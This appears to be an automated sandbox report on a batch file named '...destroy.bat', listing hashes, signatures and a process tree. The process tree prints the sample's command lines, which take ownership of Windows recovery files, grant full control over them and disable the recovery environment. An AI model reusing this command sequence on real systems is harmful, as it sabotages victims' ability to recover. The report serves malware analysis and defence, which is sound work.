Analysis
- max time kernel: 45s
- max time network: 49s
- platform: windows7_x64
- resource: win7-20220901-en
- resource tags: arch:x64, arch:x86, image:win7-20220901-en, locale:en-us, os:windows7-x64, system
- submitted: 19-10-2022 17:06

Static task: static1
Behavioral task: behavioral1
Sample: 111.90.151.174_7777__destroy.bat
Resource: win7-20220901-en
General
- Target: 111.90.151.174_7777__destroy.bat
- Size: 2KB
- MD5: 584db4d4d5e53b628193790c77f84d58
- SHA1: ba7c740867ad6184e9971735cc6d1bedf1443078
- SHA256: 5218ed9598e05be41fc39d056e038c1a6fb054444ee3c5e8e54714ce1d258448
- SHA512: 05f5e8185714f068c0f804095867e1d875c0f970f61078f3f42effae565baf7a507daf841037df777745882901af74f40e18ade08f743ad368cb2b18c0eced6e
Malware Config
Signatures
- Possible privilege escalation attempt (26 IoCs)
  Processes (pid, process):
  1960 takeown.exe
  572 icacls.exe
  1452 takeown.exe
  1428 icacls.exe
  1016 icacls.exe
  1648 takeown.exe
  464 icacls.exe
  2004 icacls.exe
  456 takeown.exe
  1276 icacls.exe
  1896 takeown.exe
  1516 takeown.exe
  1612 icacls.exe
  964 takeown.exe
  1976 takeown.exe
  664 icacls.exe
  1732 icacls.exe
  580 icacls.exe
  1768 takeown.exe
  1196 icacls.exe
  1152 takeown.exe
  1912 takeown.exe
  1816 takeown.exe
  1632 icacls.exe
  1564 takeown.exe
  1520 icacls.exe
- Modifies file permissions (1 TTP, 26 IoCs)
  Processes (pid, process):
  964 takeown.exe
  664 icacls.exe
  1816 takeown.exe
  1732 icacls.exe
  456 takeown.exe
  1768 takeown.exe
  1196 icacls.exe
  1976 takeown.exe
  1648 takeown.exe
  1960 takeown.exe
  1428 icacls.exe
  1016 icacls.exe
  1632 icacls.exe
  1564 takeown.exe
  1520 icacls.exe
  1152 takeown.exe
  580 icacls.exe
  1276 icacls.exe
  1896 takeown.exe
  572 icacls.exe
  1452 takeown.exe
  1516 takeown.exe
  1612 icacls.exe
  2004 icacls.exe
  1912 takeown.exe
  464 icacls.exe
- Drops file in System32 directory (2 IoCs)
  Processes (description, ioc, process):
  File opened for modification | C:\Windows\system32\Recovery | ReAgentc.exe
  File opened for modification | C:\Windows\system32\Recovery\ReAgent.xml | ReAgentc.exe
- Suspicious use of AdjustPrivilegeToken (12 IoCs)
  Processes (description, pid, process):
  Token: SeTakeOwnershipPrivilege | 1960 | takeown.exe
  Token: SeTakeOwnershipPrivilege | 456 | takeown.exe
  Token: SeTakeOwnershipPrivilege | 1768 | takeown.exe
  Token: SeTakeOwnershipPrivilege | 1896 | takeown.exe
  Token: SeTakeOwnershipPrivilege | 1452 | takeown.exe
  Token: SeTakeOwnershipPrivilege | 1152 | takeown.exe
  Token: SeTakeOwnershipPrivilege | 964 | takeown.exe
  Token: SeTakeOwnershipPrivilege | 1976 | takeown.exe
  Token: SeTakeOwnershipPrivilege | 1912 | takeown.exe
  Token: SeTakeOwnershipPrivilege | 1816 | takeown.exe
  Token: SeTakeOwnershipPrivilege | 1648 | takeown.exe
  Token: SeTakeOwnershipPrivilege | 1564 | takeown.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (pid, process -> target pid, target process; each pair is listed three times in the report, the last one once because the list is capped at 64 IoCs):
  PID 2032 cmd.exe wrote to memory of 940 cmd.exe (3 entries)
  PID 940 cmd.exe wrote to memory of 1960 takeown.exe (3 entries)
  PID 940 cmd.exe wrote to memory of 1732 icacls.exe (3 entries)
  PID 940 cmd.exe wrote to memory of 1204 ReAgentc.exe (3 entries)
  PID 940 cmd.exe wrote to memory of 1224 ReAgentc.exe (3 entries)
  PID 940 cmd.exe wrote to memory of 520 ReAgentc.exe (3 entries)
  PID 940 cmd.exe wrote to memory of 456 takeown.exe (3 entries)
  PID 940 cmd.exe wrote to memory of 580 icacls.exe (3 entries)
  PID 940 cmd.exe wrote to memory of 1768 takeown.exe (3 entries)
  PID 940 cmd.exe wrote to memory of 1276 icacls.exe (3 entries)
  PID 940 cmd.exe wrote to memory of 1896 takeown.exe (3 entries)
  PID 940 cmd.exe wrote to memory of 572 icacls.exe (3 entries)
  PID 940 cmd.exe wrote to memory of 1452 takeown.exe (3 entries)
  PID 940 cmd.exe wrote to memory of 1196 icacls.exe (3 entries)
  PID 940 cmd.exe wrote to memory of 1516 takeown.exe (3 entries)
  PID 940 cmd.exe wrote to memory of 1612 icacls.exe (3 entries)
  PID 940 cmd.exe wrote to memory of 1152 takeown.exe (3 entries)
  PID 940 cmd.exe wrote to memory of 1428 icacls.exe (3 entries)
  PID 940 cmd.exe wrote to memory of 964 takeown.exe (3 entries)
  PID 940 cmd.exe wrote to memory of 1016 icacls.exe (3 entries)
  PID 940 cmd.exe wrote to memory of 1976 takeown.exe (3 entries)
  PID 940 cmd.exe wrote to memory of 2004 icacls.exe (1 entry)
Processes
- C:\Windows\system32\cmd.exe (depth 1)
  cmd /c "C:\Users\Admin\AppData\Local\Temp\111.90.151.174_7777__destroy.bat"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe (depth 2)
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\111.90.151.174_7777__destroy.bat" MY_FLAG
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\takeown.exe (depth 3)
      TAKEOWN /F "C:\Windows\System32\rstrui.exe"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\icacls.exe (depth 3)
      ICACLS "C:\Windows\System32\rstrui.exe" /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    - C:\Windows\System32\ReAgentc.exe (depth 3)
      REAGENTC.EXE /disable
      - Drops file in System32 directory
    - C:\Windows\System32\ReAgentc.exe (depth 3)
      REAGENTC.EXE /disable /logpath C:\Temp\Reagent.log
    - C:\Windows\System32\ReAgentc.exe (depth 3)
      REAGENTC.EXE /disable /logpath C:\Windows\Logs\Reagent
    - C:\Windows\System32\takeown.exe (depth 3)
      TAKEOWN /F "C:\Windows\System32\ReAgentc.exe"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\icacls.exe (depth 3)
      ICACLS "C:\Windows\System32\ReAgentc.exe" /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    - C:\Windows\System32\takeown.exe (depth 3)
      TAKEOWN /F "C:\Windows\Logs\ReAgent\ReAgent.log"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\icacls.exe (depth 3)
      ICACLS "C:\Windows\Logs\ReAgent\ReAgent.log" /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    - C:\Windows\System32\takeown.exe (depth 3)
      TAKEOWN /F "C:\Windows\Logs\WinREAgent\diagerr.xml"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\icacls.exe (depth 3)
      ICACLS "C:\Windows\Logs\WinREAgent\diagerr.xml" /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    - C:\Windows\System32\takeown.exe (depth 3)
      TAKEOWN /F "C:\Windows\Logs\WinREAgent\diagwrn.xml"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\icacls.exe (depth 3)
      ICACLS "C:\Windows\Logs\WinREAgent\diagwrn.xml" /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    - C:\Windows\System32\takeown.exe (depth 3)
      TAKEOWN /F "C:\Windows\System32\Recovery\ReAgent.xml"
      - Possible privilege escalation attempt
      - Modifies file permissions
    - C:\Windows\System32\icacls.exe (depth 3)
      ICACLS "C:\Windows\Logs\WinREAgent\diagwrn.xml" /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    - C:\Windows\System32\takeown.exe (depth 3)
      TAKEOWN /F "C:\Windows\System32\Recovery\ReAgent.dll"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\icacls.exe (depth 3)
      ICACLS "C:\Windows\System32\Recovery\ReAgent.dll" /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    - C:\Windows\system32\takeown.exe (depth 3)
      TAKEOWN /F "C:\Windows\System32\Recovery\ReAgentTask.dll"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\icacls.exe (depth 3)
      ICACLS "C:\Windows\System32\Recovery\ReAgentTask.dll" /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    - C:\Windows\system32\takeown.exe (depth 3)
      TAKEOWN /F "C:\Windows\System32\Recovery\recdisc.exe"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\icacls.exe (depth 3)
      ICACLS "C:\Windows\System32\Recovery\recdisc.exe" /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    - C:\Windows\system32\takeown.exe (depth 3)
      TAKEOWN /F "C:\Windows\System32\Recovery\recovery.exe"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\icacls.exe (depth 3)
      ICACLS "C:\Windows\System32\Recovery\recovery.exe" /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    - C:\Windows\system32\takeown.exe (depth 3)
      TAKEOWN /F "C:\Windows\System32\Recovery\recovery.dll"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\icacls.exe (depth 3)
      ICACLS "C:\Windows\System32\Recovery\recovery.dll" /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    - C:\Windows\system32\takeown.exe (depth 3)
      TAKEOWN /F "C:\Windows\System32\Recovery\recovery.dll"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\icacls.exe (depth 3)
      ICACLS "C:\Windows\System32\Recovery\recovery.dll" /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    - C:\Windows\system32\takeown.exe (depth 3)
      TAKEOWN /F "C:\Windows\System32\Recovery\RecoveryDrive.exe"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\icacls.exe (depth 3)
      ICACLS "C:\Windows\System32\Recovery\RecoveryDrive.exe" /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Windows\System32\Recovery\ReAgent.xml
  Filesize: 734B
  MD5: b90c609e64f6a5085e95e94908131e2f
  SHA1: e267458cdcd8ba084bb23189c9c3569a2b912090
  SHA256: 95751ac34cdf3796244ea6298c6a53eb10a1a54faf5fcb0ff1b857e3e90b97f6
  SHA512: 19a240ea24c53ac5027ad878d4c4cf375fdd5a70685c659100aab1ccba301052d1a2fc199c0bb5bc1b7ab32813e8ce5270419cb9974457a197633d701b3726fa
- memory/456-63-0x0000000000000000-mapping.dmp
- memory/464-85-0x0000000000000000-mapping.dmp
- memory/520-61-0x0000000000000000-mapping.dmp
- memory/572-68-0x0000000000000000-mapping.dmp
- memory/580-64-0x0000000000000000-mapping.dmp
- memory/664-81-0x0000000000000000-mapping.dmp
- memory/940-54-0x0000000000000000-mapping.dmp
- memory/964-76-0x0000000000000000-mapping.dmp
- memory/1016-77-0x0000000000000000-mapping.dmp
- memory/1152-74-0x0000000000000000-mapping.dmp
- memory/1196-70-0x0000000000000000-mapping.dmp
- memory/1204-57-0x0000000000000000-mapping.dmp
- memory/1204-58-0x000007FEFC2F1000-0x000007FEFC2F3000-memory.dmp
  Filesize: 8KB
- memory/1224-59-0x0000000000000000-mapping.dmp
- memory/1276-66-0x0000000000000000-mapping.dmp
- memory/1428-75-0x0000000000000000-mapping.dmp
- memory/1452-69-0x0000000000000000-mapping.dmp
- memory/1516-71-0x0000000000000000-mapping.dmp
- memory/1520-87-0x0000000000000000-mapping.dmp
- memory/1564-86-0x0000000000000000-mapping.dmp
- memory/1612-73-0x0000000000000000-mapping.dmp
- memory/1632-83-0x0000000000000000-mapping.dmp
- memory/1648-84-0x0000000000000000-mapping.dmp
- memory/1732-56-0x0000000000000000-mapping.dmp
- memory/1768-65-0x0000000000000000-mapping.dmp
- memory/1816-82-0x0000000000000000-mapping.dmp
- memory/1896-67-0x0000000000000000-mapping.dmp
- memory/1912-80-0x0000000000000000-mapping.dmp
- memory/1960-55-0x0000000000000000-mapping.dmp
- memory/1976-78-0x0000000000000000-mapping.dmp
- memory/2004-79-0x0000000000000000-mapping.dmp